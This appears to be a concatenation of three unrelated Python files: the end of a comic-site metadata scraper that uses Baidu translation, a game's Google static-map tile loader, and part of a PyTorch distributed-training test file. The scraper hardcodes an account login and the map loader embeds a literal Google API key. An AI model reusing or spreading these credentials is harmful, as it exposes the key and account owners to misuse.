for v in info.get("docs", []):
a = DbBook()
a.id = v.get('_id')
a.title = v.get('title', "").replace("'", " ").replace("\"", " ")
a.author = v.get('author', "").replace("'", " ").replace("\"", " ")
a.chineseTeam = v.get('chineseTeam', "").replace("'", " ").replace("\"", " ")
a.description = v.get('description', "").replace("'", " ").replace("\"", " ")
a.finished = v.get('finished')
a.categories = v.get('categories', [])
a.tags = v.get('tags', [])
a.likesCount = v.get('likesCount', 0)
a.created_at = v.get('created_at', "")
a.updated_at = v.get('updated_at', "")
a.path = v.get('thumb', {}).get("path")
a.fileServer = v.get('thumb', {}).get("fileServer")
a.originalName = v.get('thumb', {}).get("originalName", "").replace("'", " ").replace("\"", " ")
a.pages = v.get('pagesCount', 0)
a.epsCount = v.get('epsCount', 0)
# self.books[a.id] = a
# self.AddHistory(a)
self._needUpIds.add(a.id)
return page + 1, pages
else:
return page + 1, maxPage
except Exception as es:
return page + 1, maxPage
# def LoadRandomNextPage(self):
# task = Server().Send(req.GetRandomReq(), isASync=False)
# if hasattr(task.res, "raw"):
# return self.SendRandomBack(task.res.raw.text)
# return
#
# def SendRandomBack(self, raw):
# try:
# data = json.loads(raw)
# if data.get("code") == 200:
# for v in data.get("data").get('comics', []):
# if v.get("_id") in self.books:
# continue
# a = Book()
# a.id = v.get('_id')
# a.title = v.get('title', "").replace("'", "\"").replace("/"", " " ")
# a.author = v.get('author', "").replace("'", "\"").replace("/"", " " ")
# a.chineseTeam = v.get('chineseTeam', "").replace("'", "\"").replace("/"", " " ")
# a.description = v.get('description', "").replace("'", "\"").replace("/"", " " ")
# a.finished = v.get('finished')
# a.categories = v.get('categories', [])
# a.tags = v.get('tags', [])
# a.likesCount = v.get('likesCount', 0)
# a.created_at = v.get('created_at', "")
# a.updated_at = v.get('updated_at', "")
# a.path = v.get('thumb', {}).get("path")
# a.fileServer = v.get('thumb', {}).get("fileServer")
# a.originalName = v.get('thumb', {}).get("originalName").replace("/"", " " ")
# a.pages = v.get('pagesCount', 0)
# a.epsCount = v.get('epsCount', 0)
# self.books[a.id] = a
# # self.AddHistory(a)
# self._resultQueue.put(a.id)
# return
# else:
# return
# except Exception as es:
# return
def OpenBookBack(self, raw):
try:
data = json.loads(raw)
if data.get("code") == 200:
if data.get("data").get("comic"):
info = data['data']['comic']
bookInfo = DbBook()
bookInfo.id = info.get("_id")
bookInfo.description = Converter('zh-hans').convert(info.get("description", "")).replace("'", "\"")
bookInfo.created_at = info.get("created_at")
bookInfo.updated_at = info.get("updated_at")
bookInfo.chineseTeam = Converter('zh-hans').convert(info.get("chineseTeam", "")).replace("'", "\"")
bookInfo.author = Converter('zh-hans').convert(info.get("author", "")).replace("'", "\"")
bookInfo.finished = info.get("finished")
bookInfo.likesCount = info.get("likesCount")
bookInfo.pages = info.get("pagesCount")
bookInfo.title = Converter('zh-hans').convert(info.get("title", "")).replace("'", "\"")
bookInfo.epsCount = info.get("epsCount")
bookInfo.tags = info.get("tags", [])
if bookInfo.tags:
bookInfo.tags = Converter('zh-hans').convert(",".join(bookInfo.tags))
bookInfo.categories = info.get("categories", [])
if bookInfo.categories:
bookInfo.categories = Converter('zh-hans').convert(",".join(bookInfo.categories))
bookInfo.path = info.get("thumb", {}).get("path", "")
bookInfo.fileServer = info.get("thumb", {}).get("fileServer", "")
bookInfo.originalName = info.get("thumb", {}).get("originalName", "").replace("'", "\"")
bookInfo.totalLikes = info.get("totalLikes")
bookInfo.totalViews = info.get("totalViews")
self._updateIds[bookInfo.id] = bookInfo
self._resultQueue.put(bookInfo.id)
except Exception as es:
Log.Error(es)
def Run(self):
page = 1
maxPage = 1
categoryIndex = 1
while categoryIndex < len(self.idToCateGoryBase):
categoryIndex, page, maxPage = self.LoadNextPage2(categoryIndex, page, maxPage)
Log.Info("star update book, len:{}".format(len(self._needUpIds)))
for bookId in self._needUpIds:
task = Server().Send(req.GetComicsBookReq(bookId), isASync=False)
if hasattr(task.res, "raw"):
self.OpenBookBack(task.res.raw.text)
self._resultQueue.put(0)
return
# def Run2(self):
# count = 10000
# while count >= 0:
# count -= 1
# self.LoadRandomNextPage()
# time.sleep(1)
def Main(self):
while True:
try:
task = self._resultQueue.get(True)
except Exception as es:
continue
pass
self._resultQueue.task_done()
try:
if not self.RunMain(task):
break
except Exception as es:
Log.Error(es)
pass
return
def RunMain(self, task):
bookId = task
if bookId == 0:
Log.Info("end, exit")
return False
book = self._updateIds.get(bookId)
assert isinstance(book, DbBook)
if bookId in self.books:
oldBooks = self.books.get(bookId)
if book.updated_at == oldBooks.updated_at:
return True
else:
oldBooks.updated_at = book.updated_at
oldBooks.path = book.path
oldBooks.finished = book.finished
oldBooks.categories = book.categories
oldBooks.author = book.author
oldBooks.chineseTeam = book.chineseTeam
oldBooks.title = book.title
oldBooks.description = book.description
oldBooks.tags = book.tags
oldBooks.fileServer = book.fileServer
oldBooks.originalName = book.originalName
oldBooks.epsCount = book.epsCount
oldBooks.pages = book.pages
oldBooks.likesCount = book.likesCount
oldBooks.totalViews = book.totalViews
oldBooks.totalLikes = book.totalLikes
print("update BookId {}".format(bookId))
else:
if not self.BaiduFanyi(bookId):
return True
self.books[bookId] = book
oldBooks = book
print("add new BookId {}".format(bookId))
self.count += 1
self._updateIds.pop(bookId)
self.AddHistory(oldBooks)
# print("count "+str(self.count)+"/"+str(len(self.books)))
# if self.count % 100 == 0:
self.cur.execute("COMMIT")
return True
def BaiduFanyi(self, taskId):
book = self._updateIds.get(taskId)
salt = randint(32768, 65536)
q = book.title
sign = self.appid + q + str(salt) + self.secretKey
sign = md5(sign.encode()).hexdigest()
myurl = self.url + '?appid=' + self.appid + '&q=' + parse.quote(q) + '&from=' + self.fromLang + '&to=' + self.toLang + '&salt=' + str(
salt) + '&sign=' + sign
try:
data = requests.get(myurl)
result = json.loads(data.text)
string = ''
for word in result['trans_result']:
if word == result['trans_result'][-1]:
string += word['dst']
else:
string += word['dst'] + '\n'
book.title2 = string
time.sleep(0.1)
return True
except Exception as Ex:
Log.Error(Ex)
self._resultQueue.put(taskId)
return False
if __name__ == "__main__":
config.LogIndex = 1
Log.Init()
Log.UpdateLoggingLevel()
config.HttpProxy = "http://127.0.0.1:10809"
config.CanWaifu2x = False
data = Server().Send(req.LoginReq("tonquer2", "tonquer2"), isASync=False)
Server().token = data.res.data.get("token")
data2 = Server().Send(req.CategoryReq(), isASync=False)
a = MainInfo()
for info in data2.res.data.get("categories", {}):
if info.get("isWeb"):
continue
a.idToCateGoryBase.append(info.get("title"))
# time.sleep(12)
a.thread.start()
a.Main()
print("exit")
pass
|
MapLoader.py
|
from io import BytesIO
from PIL import Image
from urllib import request
import os
from pathlib import Path
import time
import threading
from SimpleGUICS2Pygame import simpleguics2pygame
from Classes.Middle.SpriteControl.SpriteAnimator import SpriteAnimator
from Classes.Base.Vector import Vector
from Classes.Super.MapTile import MapTile
from SimpleGUICS2Pygame import simpleguics2pygame
from Classes.Functions.Geometry import getMetersPerPixelGoogleImage,getMetersPerPixelsCam,getLatLongFromCoordinates
import matplotlib.pyplot as plt # this is if you want to plot the map using pyplot
import math
class MapLoader():
def __init__(self,zoom):
self.zoom=zoom
self.delay=2
self.currentTime=time.time()
self.tile_dict={}
self.cwd=os.getcwd()
self.loadingKeys={}
def updateTime(self):
self.delay-=time.time()-self.currentTime
def update(self,baseNode,cam,sprite_dict):
if self.delay<=0:
self.generatePoints(cam,sprite_dict,baseNode)
self.delay=2
else:
self.updateTime()
self.currentTime=time.time()
def generatePoints(self,cam,sprite_dict,baseNode):
self.updateZoomDistance(cam,baseNode)
mpp=512 #size of image
scaleFactor=self.getImageScaleFactor(self.zoom, getLatLongFromCoordinates(baseNode,cam.origin)[0])
mpp*=scaleFactor
key_dict={}
remove_dict={}
for x in range(int((cam.origin.getX()-cam.dim.getX())//mpp),int(((cam.origin.getX()+cam.dim.getX())//mpp)+1)):
for y in range(int((cam.origin.getY()-cam.dim.getY())//mpp),int(((cam.origin.getY()+cam.dim.getY())//mpp)+1)):
key=self.constructKey(x,y,self.zoom)
directory=self.cwd+'/img/Map/'+key+'.png'
if not key in sprite_dict:
point = getLatLongFromCoordinates(baseNode, Vector(x * mpp, y * mpp))
url = self.getUrl(point[0], point[1], self.zoom)
path=Path(directory)
image=0
if path.is_file():
image=simpleguics2pygame._load_local_image(directory)
elif not key in self.loadingKeys:
imgThread=threading.Thread(target=self.loadImage,args=(url,directory))
imgThread.start()
self.loadingKeys.update({key:key})
# if image in file load from file else load from simpleguics2 as bellow
# else load image from url and save to directory
if image != 0:
tile = SpriteAnimator(image, scaleFactor)
radius=256*scaleFactor
sprite_dict.update({key: tile})
mapTile = MapTile(Vector(x*mpp,y*mpp),self.zoom,key,sprite_dict,radius)
self.tile_dict.update({key: mapTile})
elif key not in self.tile_dict:
radius = 256 * scaleFactor
mapTile = MapTile(Vector(x * mpp, y * mpp), self.zoom, key, sprite_dict,radius)
self.tile_dict.update({key:mapTile})
key_dict.update({key:key})
for key in self.tile_dict:
if key not in key_dict:
remove_dict.update({key:key})
for key in remove_dict:
self.tile_dict.pop(key)
def loadImage(self,url,directory):
with request.urlopen(url) as uRL:
f = BytesIO(uRL.read())
img = Image.open(f)
img.save(directory)
def draw(self,canvas,cam):
a=0
for key in self.tile_dict:
a+=1
tile=self.tile_dict[key]
tile.draw(canvas,cam)
def updateZoomDistance(self,cam,baseNode):
zoom=20
for i in range(0,19):
j=20-i
if getMetersPerPixelGoogleImage(getLatLongFromCoordinates(baseNode,cam.origin)[0],j)>getMetersPerPixelsCam(cam):
break
else:
zoom=j
self.zoom=zoom-1
def constructKey(self,lat,long,zoom):
lat=str(lat)
long=str(long)
zoom=str(zoom)
key=lat+long+zoom
return key
def getUrl(self,lat,long,zoom):
lat=round(lat,6)
long=round(long,6)
lat=str(lat)
long=str(long)
zoom=str(zoom)
p1='http://maps.googleapis.com/maps/api/staticmap?center='
p1= p1+lat+','+long+'&size=512x512&zoom='+zoom+'&format=png&maptype=roadmap&style=element:geometry%7Ccolor:0xebe3cd&style=element:labels.text.fill%7Ccolor:0x523735&style=element:labels.text.stroke%7Ccolor:0xf5f1e6&style=feature:administrative%7Celement:geometry.stroke%7Ccolor:0xc9b2a6&style=feature:administrative.land_parcel%7Celement:geometry.stroke%7Ccolor:0xdcd2be&style=feature:administrative.land_parcel%7Celement:labels%7Cvisibility:off&style=feature:administrative.land_parcel%7Celement:labels.text.fill%7Ccolor:0xae9e90&style=feature:landscape.natural%7Celement:geometry%7Ccolor:0xdfd2ae&style=feature:poi%7Celement:geometry%7Ccolor:0xdfd2ae&style=feature:poi%7Celement:labels%7Cvisibility:off&style=feature:poi%7Celement:labels.text%7Ccolor:0x6b4e00%7Cvisibility:on&style=feature:poi%7Celement:labels.text.fill%7Ccolor:0x93817c%7Cvisibility:off&style=feature:poi.park%7Celement:geometry.fill%7Ccolor:0xa5b076&style=feature:poi.park%7Celement:labels.text.fill%7Ccolor:0x447530&style=feature:road%7Celement:geometry%7Ccolor:0xf5f1e6&style=feature:road.arterial%7Cvisibility:off&style=feature:road.arterial%7Celement:geometry%7Ccolor:0xfdfcf8&style=feature:road.highway%7Celement:geometry%7Ccolor:0xf8c967&style=feature:road.highway%7Celement:geometry.stroke%7Ccolor:0xe9bc62&style=feature:road.highway%7Celement:labels%7Cvisibility:off&style=feature:road.highway.controlled_access%7Celement:geometry%7Ccolor:0xe98d58&style=feature:road.highway.controlled_access%7Celement:geometry.stroke%7Ccolor:0xdb8555&style=feature:road.local%7Cvisibility:off&style=feature:road.local%7Celement:labels%7Cvisibility:off&style=feature:road.local%7Celement:labels.text.fill%7Ccolor:0x806b63&style=feature:transit.line%7Celement:geometry%7Ccolor:0xdfd2ae&style=feature:transit.line%7Celement:geometry.fill%7Ccolor:0x000000%7Csaturation:-100%7Clightness:-100%7Cweight:0.5&style=feature:transit.line%7Celement:labels.text%7Cvisibility:on&style=feature:transit.line%7Celement:labels.text.fill%7Ccolor:0x8f7d77&style=feature:transit.line%7Celement:labels.text.stroke%7Ccolor:0xebe3cd&style=feature:transit.station%7Celement:geometry%7Ccolor:0xdfd2ae&style=feature:transit.station.rail%7Celement:geometry.fill%7Csaturation:-100&style=feature:water%7Celement:geometry.fill%7Ccolor:0xb9d3c2&style=feature:water%7Celement:labels.text.fill%7Ccolor:0x92998d&'+'sensor=false'
p1=p1+'&key=AIzaSyCPw8pNEVEb7g3jQPj2w4EeaTidz-4qJ-E'
return p1
def getImageScaleFactor(self,zoom,lat):
m2=getMetersPerPixelGoogleImage(lat,zoom)
return m2
|
test_c10d_common.py
|
import copy
import os
import sys
import tempfile
import threading
import time
from datetime import timedelta
from itertools import product
from sys import platform
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
TEST_WITH_TSAN,
)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
torch.backends.cuda.matmul.allow_tf32 = False
def gpus_for_rank(world_size):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
class AbstractTimeoutTest(object):
def _test_store_timeout(self, backend, init_method, c2p):
try:
c10d.distributed_c10d.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d.distributed_c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
c10d.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
# Could say
# x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
# etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
# is to verify weights are where expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
class AbstractDistributedDataParallelTest(object):
def tearDown(self):
# DistributedDataParallel test doesn't seem to call FileStore destructor
# TODO: investigate this test and the test is known to have issues
# Use this hack to remove files for that test
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
integers, a list of `torch.Device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
must always be specified as list of `torch.Device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertTrue(ddp_logging_data.get("is_multi_device_module"))
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertFalse(ddp_logging_data.get("is_multi_device_module"))
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
# DDP training, DDP scatters subsets of input_cpu to nodes/GPUs
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
[self.assertEqual(p.grad, expected_grad) for p in model.parameters()]
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
fut = torch.futures.Future()
fut.set_result(torch.ones_like(bucket.buffer()))
def fut_then(fut):
# Add ones to fut's result.
t = fut.value()
return t + torch.ones_like(t)
return fut.then(fut_then)
# TSAN is not fork-safe since we're forking in a multi-threaded environment
if not TEST_WITH_TSAN:
class DistributedDataParallelTest(
AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
class ComputeBucketAssignmentTest(TestCase):
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [40, 80]
)
self.assertEqual(per_bucket_size_limits, [40, 80, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [200, 400]
)
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
self.assertEqual(per_bucket_size_limits, [200, 200, 400, 400])
class AbstractCommTest(object):
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _verify_sequence_number_across_pg(self, pg, verify_pg):
seq_num = pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
# We use a separate pg to verify the sequence numbers, otherwise these
# collectives will themselves increment the sequence number.
dist.all_gather_object(obj_list, seq_num, group=verify_pg)
self.assertEqual(len(set(obj_list)), 1)
return obj_list[0]
def _test_sequence_num_incremented(self, process_group, ranks):
# verify initial sequence numbers. Use a distinct process group for
# verification to keep counts as expected with respect to process_group.
verify_pg = dist.new_group(
ranks=ranks,
backend="gloo",
)
assert dist.get_world_size(process_group) == dist.get_world_size(verify_pg)
initial_num = (
self._verify_sequence_number_across_pg(
pg=process_group, verify_pg=verify_pg
)
if not c10d.distributed_c10d._rank_not_in_group(process_group)
else -1
)
# Verify sequence numbers are appropriately incremented
for i in range(10):
t = torch.ones(1, device=torch.cuda.current_device())
dist.all_reduce(t, group=process_group)
if not c10d.distributed_c10d._rank_not_in_group(process_group):
seq_num = self._verify_sequence_number_across_pg(
pg=process_group,
verify_pg=verify_pg,
)
self.assertEqual(initial_num + i + 1, seq_num)
if dist.get_world_size(process_group) > 2:
# Test when certain ranks don't call collectives
if dist.get_rank(process_group) not in [0, 2]:
dist.all_reduce(t, group=process_group, async_op=True)
# Now ranks 0 and 2 should be lagging by 1.
if not c10d.distributed_c10d._rank_not_in_group(process_group):
seq_num = process_group._get_sequence_number_for_group()
rank = dist.get_rank(process_group)
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
dist.all_gather_object(obj_list, (rank, seq_num), group=verify_pg)
rank_to_seq_num = {rank: num for (rank, num) in obj_list}
self.assertEqual(len(set(rank_to_seq_num.values())), 2)
self.assertEqual(rank_to_seq_num[0], rank_to_seq_num[2])
expected_same = {
rank_to_seq_num[i]
for i in rank_to_seq_num.keys()
if i not in [0, 2]
}
self.assertEqual(len(expected_same), 1)
self.assertEqual(rank_to_seq_num[0] + 1, rank_to_seq_num[1])
def _test_sequence_num_incremented_default_group(self, backend_name):
torch.cuda.set_device(self.rank)
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
self._test_sequence_num_incremented(
c10d.distributed_c10d._get_default_group(),
ranks=list(i for i in range(dist.get_world_size())),
)
def _test_sequence_num_incremented_subgroup(self, backend_name):
torch.cuda.set_device(self.rank)
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup_ranks = [0, 1, 2]
subgroup = dist.new_group(subgroup_ranks)
self._test_sequence_num_incremented(subgroup, subgroup_ranks)
def _test_sequence_num_set_default_pg(self, backend):
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
default_pg = c10d.distributed_c10d._get_default_group()
seq_num = default_pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size())]
dist.all_gather_object(obj_list, seq_num)
self.assertEqual(len(set(obj_list)), 1)
def _test_sequence_num_set_new_group(self, backend):
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup = dist.new_group([0, 1])
if not c10d.distributed_c10d._rank_not_in_group(subgroup):
subgroup_seq = subgroup._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(subgroup))]
dist.all_gather_object(obj_list, subgroup_seq, group=subgroup)
self.assertEqual(len(set(obj_list)), 1)
# TSAN is not fork-safe since we're forking in a multi-threaded environment
if not TEST_WITH_TSAN:
class CommTest(AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
if sys.platform == "win32":
